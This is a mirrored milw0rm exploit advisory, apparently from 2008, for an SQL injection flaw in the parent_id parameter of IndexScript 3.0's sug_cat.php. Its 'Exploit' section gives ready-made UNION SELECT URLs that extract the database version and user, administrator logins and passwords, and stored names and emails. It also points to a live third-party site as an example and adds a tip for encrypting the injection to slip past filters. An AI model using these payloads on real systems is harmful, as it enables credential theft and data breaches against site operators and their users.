Docstoc

IndexScript 3.0 sug_cat.php parent_id SQL Injection Vulnerability

Document Sample
IndexScript 3.0 sug_cat.php parent_id SQL Injection Vulnerability Powered By Docstoc
					                     IndexScript 3.0 sug_cat.php parent_id SQL Injection Vulnerability                             Page 1/1
   1    [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
   2    [~] IndexScript v 3.0 [sug_cat.php?parent_id] − SQL injection Vulnerability
   3    [~]
   4    [~] http://www.indexscript.com/download.php
   5    [~]
   6    [~] [IndexScript is a feature−rich and yet easy−to−use directory script that you can install for immediate use.]
   7    [~] −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
   8    [~] Bug founded by d3v1l   [Avram Marius]
   9    [~]
  10    [~] Date: 12.10.2008
  11    [~]
  12    [~]
  13    [~] d3v1l@spoofer.com    http://security−sh3ll.com
  14    [~]
  15    [~] −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  16    [~] Greetz tO ALL:−
  17    [~]
  18    [~] Security−Shell Members ( http://security−sh3ll.com/forum.php )
  19    [~]
  20    [~] Pentest| Gibon| Pig       AND      milw0rm staff
  21    [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  22    [~] Exploit :−
  23    [~]
  24    [~] http://site.com/sug_cat.php?parent_id=−1 UNION SELECT concat_ws(0x3a,version(),database(),user())−−
  25    [~]
  26    [~] http://site.com/sug_cat.php?parent_id=−1 UNION ALL SELECT login,password FROM dir_login−−
  27    [~]
  28    [~] http://site.com/sug_cat.php?parent_id=−1 UNION ALL SELECT name,email FROM dir_pend_cat−−
  29    [~]
  30    [~] Example :−
  31    [~]
  32    [~] http://spaceho.com/sug_cat.php?parent_id=SQL
  33    [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  34    [~] btw; on some sites you need to encript your injection like [−1 UNION SELECT aes_decrypt(aes_encrypt(concat]
  35    [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  36
  37    # milw0rm.com [2008−10−13]




d3v1l                                                                                                               10/13/2008

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:42
posted:5/24/2010
language:English
pages:1